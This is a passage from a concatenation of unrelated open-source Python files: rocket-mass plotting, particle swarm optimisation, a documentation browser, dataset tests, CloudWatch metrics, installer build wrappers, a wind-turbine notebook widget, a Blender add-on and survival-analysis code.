plt.plot(t_s_2, 20000 + m_s_2_propellant - (t_s_2 - 160) * m_dot_s_2)
plt.plot(t_coast_traj, 20000 + t_coast_traj * 0)
plt.xlabel('time')
plt.ylabel('m(t)')
plt.show()
'''
Falcon 9 v1.2 Full Thrust
Stage 1
- Thrust(Sea Level): 7,607 kN
- Thrust(Vacuum): 8,227 kN
- Specific Impulse: 282 s
- Dry Mass: 25,600 kg
- Propellant Mass: 395,700 kg
- Initial Mass: 421,300 kg
- Final Mass: 25,600 kg
- ISP = Ve / g
- Ve = ISP · g
- Ve = 282 · 9.807 = 2,765.574 m/s = 2.765574 km/s
Falcon9 v1.2 Stage 1 (7.75, 16.46)
- ∆V Stage 1 = 7.75 km/s = 27,900 km/h = 17,336.256 m/h
- Mass Ratio = 16.46
Stage 2
- Thrust: 934 kN
- Specific Impulse: 348 s
- Dry Mass: 3, 900 kg
- Propellant Mass: 92, 670 kg
- Initial Mass: 96, 570 kg
- Final Mass: 3, 900 kg
- ISP = Ve / g
- Ve = ISP · g
- Ve = 348 · 9.807 = 3, 412.836 m/s = 3.412836 km/s
Falcon9 v1.2 Stage 2 (10.95, 24.76)
- ∆V Stage 2 = 10.95 km/s = 39, 420 km/h = 24, 494.452 m/h
- Mass Ratio = 24.76
'''
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 28 10:20:57 2019
@author: zmddzf
"""
import numpy as np
import matplotlib.pyplot as plt
import numpy.linalg as la
class Birds:
"""
鸟群类,用于承载粒子群的数据结构
"""
def __init__(self, popsize, dim):
"""
鸟群构造器,初始化鸟群实例
:param popsize: 种群个数
:param dim: 问题维度
:param indiv_best: 个体最优适应度
:param group_best: 种群最优适应度
:param position: 占位,种群坐标
:param v_mat: 占位,种群速度
:param best_position: 占位,最优位置
"""
self.popsize = popsize
self.dim = dim
self.indiv_best = np.array([-1e10 for i in range(popsize)])
self.group_best = -1e10
self.position = None
self.v_mat = None
self.best_position = None
self.best_indiv_posion = None
def init_poplation(self, v_max, x_bound):
"""
初始化鸟群位置和速度
:param v_max: 最大速度
:param x_bound: 位置向量约束条件,x_bound = [max=[],min=[]]
"""
self.v_mat = np.random.uniform(0, v_max, (self.popsize, self.dim))
self.position = np.random.uniform(x_bound[0],x_bound[1],(self.popsize, self.dim))
self.best_indiv_posion = self.position.copy()
def select_best(self, fitness_values):
"""
选择最优的适应度与位置
:param fitness_values: 个体的适应度向量
"""
# 若当前适应度小于新的适应度,替换为新的适应度
#print('fitness:', fitness_values)
#print('preindiv:', self.indiv_best)
self.best_indiv_posion[self.indiv_best < fitness_values] = self.position[fitness_values > self.indiv_best]
self.indiv_best[self.indiv_best < fitness_values] = fitness_values[fitness_values > self.indiv_best]
# 选出当前种群最大的适应度
self.group_best = max(self.indiv_best)
# 选出当前种群最大适应度对应的位置
self.best_position = self.best_indiv_posion[self.indiv_best.argmax()]
class PSO:
"""
PSO算法的实现
"""
def __init__(self, w, c1, c2, popsize, dim, x_bound, v_max, fitness_func):
"""
PSO构造器
:param w: 惯性因子
:param c1: 自身经验加速常数
:param c2: 社会经验加速常数
:param popsize: 种群个数
:param dim: 问题维度
:param v_max: 最大速度
:param x_bound: 位置向量约束条件,x_bound = [max=[],min=[]]
:param fitness_fuc: 适应度函数,定义时需要能够支持向量的计算
"""
self.w = w
self.c1 = c1
self.c2 = c2
self.v_max = v_max
self.popsize = popsize
self.dim = dim
self.x_bound = x_bound
self.fitness_func = fitness_func
self.birds = Birds(self.popsize, self.dim)
def compute_fitness(self, X):
"""
计算种群适应度
:param X: X为行向量,每行代表一个位置
:return fitness_values: 返回适应度向量,shape为(popsize)
"""
fitness_values = self.fitness_func(X)
fitness_values = fitness_values.reshape(self.popsize)
return fitness_values
def update(self):
"""
更新位置与速度
"""
self.birds.v_mat = self.w * self.birds.v_mat + self.c1 * np.random.rand() * (self.birds.best_indiv_posion - self.birds.position) + self.c2 * np.random.rand() * (self.birds.best_position - self.birds.position)
self.birds.v_mat[self.birds.v_mat>self.v_max] = self.v_max
self.birds.position = self.birds.position + self.birds.v_mat
for i in range(len(self.x_bound[0])):
self.birds.position[:,i][self.birds.position[:,i] < self.x_bound[0][i]] = self.x_bound[0][i]
self.birds.position[:,i][self.birds.position[:,i] > self.x_bound[1][i]] = self.x_bound[1][i]
#print('postposition:')
#print(self.birds.position)
def run(self, iter_n):
# 初始化鸟群
s_ = 'generation 0\nbest fitness_value:%f'%self.birds.group_best
self.birds.init_poplation(self.v_max, self.x_bound)
fitness_values = self.compute_fitness(self.birds.position)
self.birds.select_best(fitness_values)
position_list = self.birds.position
diff_p = []
best_fitness_hist = []
best_position_hist = []
s_ = ''
for i in range(iter_n):
s1 = 'generation %d \nbest fitness_value:%f'%(i, self.birds.group_best)
w = 1 - i*0.0099999
self.w = w
self.update()
position_list = np.hstack([position_list, self.birds.position])
fitness_values = self.compute_fitness(self.birds.position)
self.birds.select_best(fitness_values)
best_fitness_hist.append(self.birds.group_best)
best_position_hist.append(self.birds.best_position)
s2 = 'group best:'+str(self.birds.group_best)
s3 = 'best position:'+str(self.birds.best_position)
s = '\n'+s1+'\n'+s2+'\n'+s3
s_ = s_ + s
position_list.reshape(self.popsize, iter_n+1, self.dim)
return self.birds, best_fitness_hist, best_position_hist, s_
def func(x):
"""
目标函数
:param x: 自变量
:return y: 函数值
"""
y = x + 10*np.sin(5*x) + 7 * np.cos(4*x)
return y
def sigmoid(x):
return 1/(1+np.e**(-x))
|
<reponame>joesantana/doxx<gh_stars>0
#!/usr/bin/env python
# encoding: utf-8
import webbrowser
from Naked.toolshed.system import stderr, stdout
docs_dict = {
"docs": "http://doxx.org",
"blog": "http://things.doxx.org",
"updates": "https://twitter.com/doxxapp",
"source": "https://github.com/chrissimpkins/doxx",
"pr": "https://github.com/doxx-repo",
"browse": "http://doxx.org/commands/browse/",
"build": "http://doxx.org/commands/build/",
"clean": "http://doxx.org/commands/clean/",
"make": "http://doxx.org/commands/make/",
"pack": "http://doxx.org/commands/pack/",
"pull": "http://doxx.org/commands/pull/",
"pullkey": "http://doxx.org/commands/pullkey/",
"search": "http://doxx.org/commands/search/",
"unpack": "http://doxx.org/commands/unpack/",
"whatis": "http://doxx.org/commands/whatis/",
"syntax": "http://doxx.org/usage/syntax/",
"template": "http://doxx.org/usage/templates/",
"key": "http://doxx.org/usage/keys/",
"archive": "http://doxx.org/usage/archives/",
"changes": "http://doxx.org/more/changelog/"
}
docs_message_dict = {
"docs": "doxx main documentation page",
"blog": "doxx blog",
"updates": "doxx Twitter updates feed",
"source": "doxx Github repository",
"pr": "doxx Package Repository",
"browse": "browse command documentation",
"build": "build command documentation",
"clean": "clean command documentation",
"make": "make command documentation",
"pack": "pack command documentation",
"pull": "pull command documentation",
"pullkey": "pullkey command documentation",
"search": "search command documentation",
"unpack": "unpack command documentation",
"whatis": "whatis command documentation",
"syntax": "syntax documentation",
"template": "template file documentation",
"key": "key file documentation",
"archive": "project archive documentation",
"changes": "doxx changelog"
}
def browse_docs(query):
"""browse doxx documentation and associated websites by query term in default web browser"""
normalized_query = query.lower()
available_queries = docs_dict.keys()
if normalized_query in available_queries:
webbrowser.open(docs_dict[normalized_query])
if normalized_query in docs_message_dict.keys():
stdout("[*] doxx: Opening the " + docs_message_dict[normalized_query])
else:
new_query = sounds_like(normalized_query) # attempt to match using other common terms
if new_query in available_queries:
webbrowser.open(docs_dict[new_query]) # open the new query term that resulted from the sounds_like function
if new_query in docs_message_dict.keys():
stdout("[*] doxx: Opening the " + docs_message_dict[new_query])
else:
stderr("[!] doxx: Unable to find a page for your query. The available queries are:", exit=0)
stderr(" ", exit=0)
for available_query in sorted(available_queries):
stderr(available_query, exit=0)
def sounds_like(query):
"""Match common query terms to the actual key mapping value in the URL dictionary"""
docs_list = ['documentation', 'help', 'doxx.org']
blog_list = ['things', 'tutorials', 'tuts']
updates_list = ['twitter', 'feed', 'update', 'news', 'whatsnew']
source_list = ['sourcecode', 'code', 'modules', 'repository']
pr_list = ['packagerepo', 'package-repo', 'packages']
template_list = ['templates']
key_list = ['keys']
archive_list = ['archives']
changes_list = ['changelog']
if query in docs_list:
return 'docs'
elif query in blog_list:
return 'blog'
elif query in updates_list:
return 'updates'
elif query in source_list:
return 'source'
elif query in pr_list:
return 'pr'
elif query in template_list:
return 'template'
elif query in key_list:
return 'key'
elif query in archive_list:
return 'archive'
elif query in changes_list:
return 'changes'
else:
return query # if it wasn't changed, just return the original query
|
<filename>tensorflow_datasets/text/glue_test.py<gh_stars>1-10
# coding=utf-8
# Copyright 2019 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the GLUE data set.
We have an individual test for each config so that we can use sharding to
prevent the test from timing out.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow_datasets import testing
from tensorflow_datasets.text import glue
class GlueColaTest(testing.DatasetBuilderTestCase):
BUILDER_CONFIG_NAMES_TO_TEST = ["cola"]
DATASET_CLASS = glue.Glue
SPLITS = {
"train": 3,
"validation": 2,
"test": 1,
}
class GlueSst2Test(testing.DatasetBuilderTestCase):
BUILDER_CONFIG_NAMES_TO_TEST = ["sst2"]
DATASET_CLASS = glue.Glue
SPLITS = {
"train": 3,
"validation": 2,
"test": 1,
}
class GlueQqpTest(testing.DatasetBuilderTestCase):
BUILDER_CONFIG_NAMES_TO_TEST = ["qqp"]
DATASET_CLASS = glue.Glue
SPLITS = {
"train": 3,
"validation": 2,
"test": 1,
}
class GlueStsbTest(testing.DatasetBuilderTestCase):
BUILDER_CONFIG_NAMES_TO_TEST = ["stsb"]
DATASET_CLASS = glue.Glue
SPLITS = {
"train": 3,
"validation": 2,
"test": 1,
}
class GlueMnliTest(testing.DatasetBuilderTestCase):
BUILDER_CONFIG_NAMES_TO_TEST = ["mnli"]
DATASET_CLASS = glue.Glue
SPLITS = {
"train": 3,
"validation_matched": 2,
"validation_mismatched": 2,
"test_matched": 1,
"test_mismatched": 1,
}
class GlueQnliTest(testing.DatasetBuilderTestCase):
BUILDER_CONFIG_NAMES_TO_TEST = ["qnli"]
DATASET_CLASS = glue.Glue
SPLITS = {
"train": 3,
"validation": 2,
"test": 1,
}
class GlueRteTest(testing.DatasetBuilderTestCase):
BUILDER_CONFIG_NAMES_TO_TEST = ["rte"]
DATASET_CLASS = glue.Glue
SPLITS = {
"train": 3,
"validation": 2,
"test": 1,
}
class GlueWnliTest(testing.DatasetBuilderTestCase):
BUILDER_CONFIG_NAMES_TO_TEST = ["wnli"]
DATASET_CLASS = glue.Glue
SPLITS = {
"train": 3,
"validation": 2,
"test": 1,
}
class GlueMrpcTest(testing.DatasetBuilderTestCase):
BUILDER_CONFIG_NAMES_TO_TEST = ["mrpc"]
DATASET_CLASS = glue.Glue
DL_EXTRACT_RESULT = {
"train": "MRPC/msr_paraphrase_train.txt",
"test": "MRPC/msr_paraphrase_test.txt",
"dev_ids": "MRPC/mrpc_dev_ids.tsv",
}
SPLITS = {
"train": 10,
"validation": 8,
"test": 15,
}
class GlueColaS3Test(GlueColaTest):
VERSION = "experimental_latest"
class GlueSst2S3Test(GlueSst2Test):
VERSION = "experimental_latest"
class GlueQqpS3Test(GlueQqpTest):
VERSION = "experimental_latest"
class GlueStsbS3Test(GlueStsbTest):
VERSION = "experimental_latest"
class GlueMnliS3Test(GlueMnliTest):
VERSION = "experimental_latest"
class GlueQnliS3Test(GlueQnliTest):
VERSION = "experimental_latest"
class GlueRteS3Test(GlueRteTest):
VERSION = "experimental_latest"
class GlueWnliS3Test(GlueWnliTest):
VERSION = "experimental_latest"
class GlueMrpcS3Test(GlueMrpcTest):
VERSION = "experimental_latest"
if __name__ == "__main__":
testing.test_main()
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import functools
from dataclasses import dataclass
from enum import Enum
import typing as t
import boto3
from datetime import datetime, timedelta
from hmalib.metrics import measure_performance, METRICS_NAMESPACE
@functools.lru_cache(maxsize=None)
def _get_cloudwatch_client():
return boto3.client("cloudwatch")
def is_publishing_metrics():
"""
Does this terraform deployment publish metrics to cloudwatch?
"""
return measure_performance
class MetricTimePeriod(Enum):
HOURS_24 = "24h"
HOURS_1 = "1h"
DAYS_7 = "7d"
def _start_time(period: MetricTimePeriod):
delta = {
MetricTimePeriod.HOURS_1: timedelta(hours=1),
MetricTimePeriod.HOURS_24: timedelta(days=1),
MetricTimePeriod.DAYS_7: timedelta(days=7),
}[period] or timedelta(days=1)
return datetime.now() - delta
def _period(period: MetricTimePeriod):
"""
Granularity of AWS statistics.
1 minute for HOURS_1; returns 60 data points
10 minutes for HOURS_24; returns 144 data points
1 hour for DAYS_7; return 168 data points
"""
return {
MetricTimePeriod.HOURS_1: 60,
MetricTimePeriod.HOURS_24: 60 * 10,
MetricTimePeriod.DAYS_7: 60 * 60,
}[period] or 60 * 10
def _pad_with_None_values(
graph_data: t.List[t.Tuple[datetime, t.Optional[int]]],
start_time: datetime,
end_time: datetime,
) -> t.List[t.Tuple[datetime, t.Optional[int]]]:
"""
Pad graph data with 0 values if the first or last entries are too far (>60
seconds) from start or end time respectively.
Note: Mutates the graph_data parameter, but returns it too.
"""
if (
len(graph_data) == 0
or abs((start_time - graph_data[0][0]).total_seconds()) > 60
):
# If start time and the first graph point have more than a minute, pad
graph_data.insert(0, (start_time, None))
if len(graph_data) == 0 or abs((end_time - graph_data[-1][0]).total_seconds()) > 60:
# If start time and the first graph point have more than a minute, pad
graph_data.append((end_time, None))
return graph_data
@dataclass
class CountMetricWithGraph:
count: int
graph_data: t.List[t.Tuple[datetime, t.Optional[int]]]
def get_count_with_graph(
names: t.List[str], time_period: MetricTimePeriod
) -> t.Dict[str, CountMetricWithGraph]:
"""
Given a time period and a set of metric names, gets the sum of the metric
over the period and a graphable list of timestamps and values.
The graph data always contains the start and end time stamps with None values
to make graphing easier.
"""
result = {}
start_time = _start_time(time_period).replace(second=0, microsecond=0, tzinfo=None)
end_time = datetime.now().replace(second=0, microsecond=0, tzinfo=None)
for metric_name in names:
stats = _get_cloudwatch_client().get_metric_statistics(
Namespace=METRICS_NAMESPACE,
MetricName=f"{metric_name}-count",
Statistics=["Sum"],
StartTime=start_time,
EndTime=end_time,
Period=_period(time_period),
)["Datapoints"]
total = int(functools.reduce(lambda acc, s: acc + s["Sum"], stats, 0))
graph_data: t.List[t.Tuple[datetime, t.Optional[int]]] = [
# Removing tzinfo because you can't work with timezone aware
# datetime objects and timezone unaware timedelta objects. Either
# way, eventually, these get decomposed to an epoch value, so this
# will not hurt.
# `_pad_with_None_values` expects timezone unaware objects.
(s["Timestamp"].replace(tzinfo=None), int(s["Sum"]))
for s in stats
]
graph_data.sort(key=lambda t: t[0]) # Sort by timestamp
graph_data = _pad_with_None_values(graph_data, start_time, end_time)
result[metric_name] = CountMetricWithGraph(total, graph_data)
return result
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Procedures to simplify the use of external tools.
#
from __future__ import print_function
from __future__ import absolute_import
import os
import sys
import subprocess
import logging
import hashlib
import distutils.spawn
from brainvisa.installer.bvi_utils.system import System
from brainvisa.installer.bvi_utils.paths import Paths
from brainvisa.installer.bvi_utils.bvi_exception import BVIException
def ifw_version(binary_creator_command=None, platform=None):
"""Try to guess IFW version.
As the commands do not provide this info, all we can do for now is to try
to find the "devtool" command, and guess it is version 2 if it is found,
and 1 otherwise.
"""
if not platform:
platform = System.platform()
if not binary_creator_command:
bc = distutils.spawn.find_executable(
Paths.binary_name(Paths.IFW_BINARYCREATOR, platform))
else:
bc = binary_creator_command
if not bc:
return [] # undefined
real_bc = os.path.realpath(bc)
path = os.path.dirname(real_bc)
if os.path.exists(
os.path.join(path,
Paths.binary_name(Paths.IFW_DEVTOOL, platform))):
return [2, ]
return [1, ]
class PathTranslationType:
HOST_TO_TARGET = 0
TARGET_TO_HOST = 1
def translate_path_wine(path,
translation_type=PathTranslationType.HOST_TO_TARGET):
# print('==== translate_path_wine')
wp = distutils.spawn.find_executable(Paths.WINEPATH)
if translation_type == PathTranslationType.HOST_TO_TARGET:
cmd = [wp, '-w', path]
elif translation_type == PathTranslationType.TARGET_TO_HOST:
cmd = [wp, '-u', path]
else:
raise TypeError('Wrong PathTranslationType %d' % translation_type)
return subprocess.check_output(cmd, universal_newlines=True).strip()
def translate_path(path, platform_target,
translation_type=PathTranslationType.HOST_TO_TARGET):
"""Translate path between platform host and target."""
platform_host = System.platform()
platform_host_family = System.platform_family(platform_host)
platform_target_family = System.platform_family(platform_target)
# print('==== translate_path')
if platform_host != platform_target.upper():
if platform_host_family == System.Family.Linux \
and platform_target_family == System.Family.Win:
return translate_path_wine(path, translation_type)
else:
raise RuntimeError('No known path translation method between '
'%s (%s family) and %s (%s family) systems'
% (platform_host, platform_host_family,
platform_target, platform_target_family))
else:
return path
def binarycreator(
installer_path, repository_path, additional_repositories=[],
online_only=False, offline_only=False, exclude=None, include=None,
platform_target=System.platform(), command=None):
"""The binarycreator tool creates an IFW installer.
Parameters
----------
installer_path : full path of installer binary.
repository_path : full path of temporary repository.
additional_repositories : additional repositories to find packages in.
online_only : True if the installer is only online
(default False).
offline_only : True if the installer is only offline
(default False).
exclude : list of excluded package's names (default None).
include : list of included package's names (default None).
platform_target : target platform to generate installer binary on
(default is the host platform)
command : binarycreator command to use (default:)
"""
param_online_only = ['--online-only'] if online_only else []
param_offline_only = ['--offline-only'] if offline_only else []
param_exclude = ['--exclude', exclude.join(',')] if exclude else []
param_include = ['--include', include.join('')] if include else []
param_config = [
'-c', translate_path('%s/config/config.xml' % repository_path,
platform_target)]
param_packages = ['-p', translate_path('%s/packages' % repository_path,
platform_target)]
for r in additional_repositories:
param_packages += ['-p', translate_path(r, platform_target)]
path = os.path.dirname(installer_path)
if not os.path.exists(path):
os.makedirs(path)
# Starts binary creator through target bv_env
cmd = [command if command else Paths.binary_name(Paths.IFW_BINARYCREATOR,
platform_target)] \
+ param_online_only + param_offline_only + param_exclude \
+ param_include + param_config + param_packages \
+ [translate_path(installer_path, platform_target)]
print(' '.join(cmd))
subprocess.check_call(cmd)
if System.platform() == System.MacOSX:
return # don't do the .md5 now: we must build the .dmg first.
# build the MD5 sum file
m = hashlib.md5()
m.update(open(installer_path, 'rb').read())
mdsum = m.digest()
if sys.version_info[0] >= 3:
mdsum_str = ''.join(['%02x' % x for x in mdsum])
else:
mdsum_str = ''.join(['%02x' % ord(x) for x in mdsum])
open(installer_path + '.md5', 'w').write(mdsum_str)
def repogen(path_repository_in, path_repository_out,
components=None, update=False,
exclude=None): # pylint: disable=R0913
"""The repogen tool generates an online IFW repositoriy.
Parameters
----------
path_repository_in : full path of temporary repository.
path_repository_out : full path of IFW repository.
components : additional components (default None).
update : True if the existing IFW repository must be updated.
exclude : list of excluded package's names (default None).
"""
param_components = [components.join(',')] if exclude else []
param_update = ['--update'] if update else []
param_exclude = ['--exclude', exclude.join(',')] if exclude else []
# param_updateurl = '-u %s' % updateurl if updateurl else ''
param_packages = ["-p", "%s/packages" % path_repository_in]
cmd = [Paths.binary_name(Paths.IFW_REPOGEN, System.platform())] \
+ param_packages + param_update + param_exclude \
+ param_components + [path_repository_out]
# param_updateurl,
print(' '.join(cmd))
subprocess.check_call(cmd)
def archivegen(folder):
"""The archivegen tool compresses the files in folder as a 7zip archive.
The archive will have the same name what the folder with the 7z extension.
Parameter
---------
folder:
folder with data which must be compressed.
"""
command = Paths.binary_name(Paths.IFW_ARCHIVEGEN, System.platform())
archive = '%s.7z' % folder
args = [command] + Paths.ARCHIVEGEN_OPTIONS + [archive, '%s' % folder]
print(' '.join(args))
if os.path.exists(archive):
os.unlink(archive)
process = subprocess.Popen(args, stdout=subprocess.PIPE, cwd=folder)
result = process.wait()
logging.getLogger().info(result)
if result < 0:
raise BVIException(BVIException.ARCHIVEGEN_FAILED, folder)
def bv_packaging(name, type_, folder, make_options=None, platform_target=None):
"""Package a component with no dependency.
Parameters
----------
name : package name.
type_ : type of package: run, doc, usrdoc, devdoc, test.
folder : destination full path.
platform_target : target platform to generate packages for
"""
args = [os.path.join(Paths.BV_BIN,
Paths.binary_name(Paths.BV_ENV_HOST,
System.platform())),
Paths.binary_name('python', System.platform()),
os.path.join(Paths.BV_BIN, Paths.BV_PACKAGING),
'dir',
'-o', folder,
'--wrappers',
'--no-deps',
'--installer']
if make_options is not None and len(make_options.strip()) > 0:
args += ['--make-options', make_options]
if platform_target is not None and len(platform_target.strip()) > 0:
args += ['--platform-target', platform_target]
args += ['+name=%s,type=%s' % (name, type_)]
subprocess.check_call(args)
|
<reponame>vikeshpandey/amazon-sagemaker-edge-manager-workshop
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import ipywidgets as widgets
import random
import time
class WindTurbine(object):
""" Represents virtually and graphically a wind turbine
It uses the raw data collected from a Wind Turbine in a circular buffer
to simulate the real turbine sensors.
"""
def __init__(self, turbine_id=0, raw_data=None):
if raw_data is None or len(raw_data) == 0:
raise Exception("You need to pass an array with at least one row for raw data")
self.turbine_id = turbine_id # id of the turbine
self.raw_data = raw_data # buffer with the raw sensors data
self.raw_data_idx = random.randint(0, len(raw_data)-1)
self.running = False # running status
self.halted = False # if True you can't use this turbine anymore. create a new one.
# components of the UI
self.stopped_img = open('../../../imgs/wind_turbine.png', 'rb').read()
self.running_img = open('../../../imgs/wind_turbine.gif', 'rb').read()
self.button = widgets.Button(description='Start (Id: %d)' % self.turbine_id)
self.button.on_click(self.__on_button_clicked)
self.img = widgets.Image(value=self.stopped_img,width=150, height=170)
self.status_label = widgets.Label(
layout={'width': "150px"}, value=''
)
self.vibration_status = widgets.Valid(value=False, description='Vibration')
self.voltage_status = widgets.Valid(value=False, description='Voltage')
self.rotation_status = widgets.Valid(value=False, description='Rotation')
self.noise_buttons = [
widgets.Button(description='Volt', layout={'width': '50px'}),
widgets.Button(description='Rot', layout={'width': '50px'}),
widgets.Button(description='Vib', layout={'width': '50px'})
]
for i in self.noise_buttons: i.on_click(self.__on_noise_button_clicked)
self.anomaly_status = widgets.VBox([
self.vibration_status, self.voltage_status, self.rotation_status,
widgets.Label("Inject noise"),
widgets.HBox(self.noise_buttons)
], layout={'visibility': 'hidden'})
def __on_noise_button_clicked(self, btn):
# change color when enabled/disabled
btn.style.button_color = 'lightgreen' if btn.style.button_color is None else None
def __on_button_clicked(self, _):
""" Deals with the event of Starting / Stopping the Turbine"""
if self.halted:
return
if not self.running:
self.running = True
self.button.description = 'Stop (Id: %d)' % self.turbine_id
self.img.value = self.running_img
else:
self.running = False
self.button.description = 'Start (Id: %d)' % self.turbine_id
self.img.value = self.stopped_img
self.update_label(self.status_label.value)
def is_running(self):
return self.running
def update_label(self, value):
self.status_label.value = value
if self.is_running() and value.startswith('Model Loaded'):
self.anomaly_status.layout.visibility='visible'
else:
self.anomaly_status.layout.visibility='hidden'
def detected_anomalies(self, values, anomalies ):
""" Updates the status of the 'inject noise' buttons (pressed or not)"""
self.vibration_status.value = not anomalies[0:3].any()
self.voltage_status.value = not anomalies[3:5].any()
self.rotation_status.value = not anomalies[5]
def is_noise_enabled(self, typ):
""" Returns the status of the 'inject noise' buttons (pressed or not)"""
assert(typ == 'Vol' or typ == 'Rot' or typ == 'Vib')
idx = 0
if typ == 'Vol': idx = 0
elif typ == 'Rot': idx = 1
elif typ == 'Vib': idx = 2
return self.noise_buttons[idx].style.button_color == 'lightgreen'
def halt(self):
""" Halts the turnine and disable it. After calling this method you can't use it anymore."""
self.running = False
self.button.description = 'Halted'
self.img.value = self.stopped_img
self.anomaly_status.layout.visibility='hidden'
self.halted = True
def read_next_sample(self):
""" next step in this simulation """
if self.raw_data_idx >= len(self.raw_data): self.raw_data_idx = 0
sample = self.raw_data[self.raw_data_idx]
self.raw_data_idx += 1
return sample
def show(self):
""" Return a IPython Widget that will render the turbine inside the notebook """
return widgets.VBox([
self.img, self.button, self.status_label, self.anomaly_status
])
|
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
Bone Motion Paths:
Match Frame Range + Clear All Paths
* Clear All Paths:
Silly operator to loop through all bones and clear their paths, useful
when having hidden bones (othrewise you have to go through each one of
them and clear manually)
*Match Current Frame Range:
Set the current frame range as motion path range.
Both requests by Hjalti from Project Pampa
Thanks to <NAME> for helping finding out the weirdness behind
Motion Paths bpy.
Developed during Caminandes Open Movie Project
"""
import bpy
class AMTH_POSE_OT_paths_clear_all(bpy.types.Operator):
"""Clear motion paths from all bones"""
bl_idname = "pose.paths_clear_all"
bl_label = "Clear All Motion Paths"
bl_options = {"UNDO"}
@classmethod
def poll(cls, context):
return context.mode == "POSE"
def execute(self, context):
# silly but works
for b in context.object.data.bones:
b.select = True
bpy.ops.pose.paths_clear()
b.select = False
return {"FINISHED"}
class AMTH_POSE_OT_paths_frame_match(bpy.types.Operator):
"""Match Start/End frame of scene to motion path range"""
bl_idname = "pose.paths_frame_match"
bl_label = "Match Frame Range"
bl_options = {"UNDO"}
def execute(self, context):
avs = context.object.pose.animation_visualization
scene = context.scene
if avs.motion_path.type == "RANGE":
if scene.use_preview_range:
avs.motion_path.frame_start = scene.frame_preview_start
avs.motion_path.frame_end = scene.frame_preview_end
else:
avs.motion_path.frame_start = scene.frame_start
avs.motion_path.frame_end = scene.frame_end
else:
if scene.use_preview_range:
avs.motion_path.frame_before = scene.frame_preview_start
avs.motion_path.frame_after = scene.frame_preview_end
else:
avs.motion_path.frame_before = scene.frame_start
avs.motion_path.frame_after = scene.frame_end
return {"FINISHED"}
def pose_motion_paths_ui(self, context):
layout = self.layout
scene = context.scene
avs = context.object.pose.animation_visualization
if context.active_pose_bone:
mpath = context.active_pose_bone.motion_path
layout.separator()
layout.label(text="Motion Paths Extras:")
split = layout.split()
col = split.column(align=True)
if context.selected_pose_bones:
if mpath:
sub = col.row(align=True)
sub.operator(
"pose.paths_update", text="Update Path", icon="BONE_DATA")
sub.operator("pose.paths_clear", text="", icon="X")
else:
col.operator(
"pose.paths_calculate",
text="Calculate Path",
icon="BONE_DATA")
else:
col.label(text="Select Bones First", icon="ERROR")
col = split.column(align=True)
col.operator(
AMTH_POSE_OT_paths_frame_match.bl_idname,
text="Set Preview Frame Range" if scene.use_preview_range else "Set Frame Range",
icon="PREVIEW_RANGE" if scene.use_preview_range else "TIME")
col = layout.column()
row = col.row(align=True)
if avs.motion_path.type == "RANGE":
row.prop(avs.motion_path, "frame_start", text="Start")
row.prop(avs.motion_path, "frame_end", text="End")
else:
row.prop(avs.motion_path, "frame_before", text="Before")
row.prop(avs.motion_path, "frame_after", text="After")
layout.separator()
layout.operator(AMTH_POSE_OT_paths_clear_all.bl_idname, icon="X")
def register():
bpy.utils.register_class(AMTH_POSE_OT_paths_clear_all)
bpy.utils.register_class(AMTH_POSE_OT_paths_frame_match)
bpy.types.DATA_PT_display.append(pose_motion_paths_ui)
def unregister():
bpy.utils.unregister_class(AMTH_POSE_OT_paths_clear_all)
bpy.utils.unregister_class(AMTH_POSE_OT_paths_frame_match)
bpy.types.DATA_PT_display.remove(pose_motion_paths_ui)
|
import warnings
import numpy as np
import pandas as pd
import xgboost as xgb
from joblib import Parallel, delayed
from sklearn.linear_model import LogisticRegression
from sklearn.neighbors import BallTree
from sklearn.preprocessing import OneHotEncoder
# lib utils
from xgbse._base import XGBSEBaseEstimator, DummyLogisticRegression
from xgbse.converters import convert_data_to_xgb_format, convert_y, hazard_to_survival
# at which percentiles will the KM predict
from xgbse.non_parametric import get_time_bins, calculate_interval_failures
KM_PERCENTILES = np.linspace(0, 1, 11)
DEFAULT_PARAMS = {
"objective": "survival:aft",
"eval_metric": "aft-nloglik",
"aft_loss_distribution": "normal",
"aft_loss_distribution_scale": 1,
"tree_method": "hist",
"learning_rate": 5e-2,
"max_depth": 8,
"booster": "dart",
"subsample": 0.5,
"min_child_weight": 50,
"colsample_bynode": 0.5,
}
DEFAULT_PARAMS_LR = {"C": 1e-3, "max_iter": 500}
def _repeat_array(x, n):
"""
Repeats an array x n times. Resulting array of ((x*n) x 1) shape.
Args:
x (np.array): An array to be repeated
n (Int): Number of times to repeat array x
Returns:
(np.array): Array x repeated n times.
"""
return np.array([x] * n).T
def _build_multi_task_targets(E, T, time_bins):
"""
Builds targets for a multi task survival regression problem.
This function creates a times array from time 0 to T, where T is the
event/censor last observed time. If time_bins > T, times greater than the last observed
time T are considered equal to -1.
Args:
E ([np.array, pd.Series]): Array of censors(0)/events(1).
T ([np.array, pd.Series]): Array of times.
time_bins ([np.array]): Specified time bins to split targets.
Returns:
targets (pd.Series): A Series with multi task targets (for data existent just up to time T=t, all times over t are considered equal to -1).
time_bins (np.array): Time bins to be used for multi task survival analysis.
"""
events = _repeat_array(E, len(time_bins))
times = _repeat_array(T, len(time_bins)) < time_bins
targets = times.astype(int)
shifted_array = np.roll(targets, 1)
shifted_array[:, 0] = 0
shifted_array = shifted_array + targets
shifted_array[shifted_array == 2] = -1
shifted_array[np.logical_not(events) & times] = -1
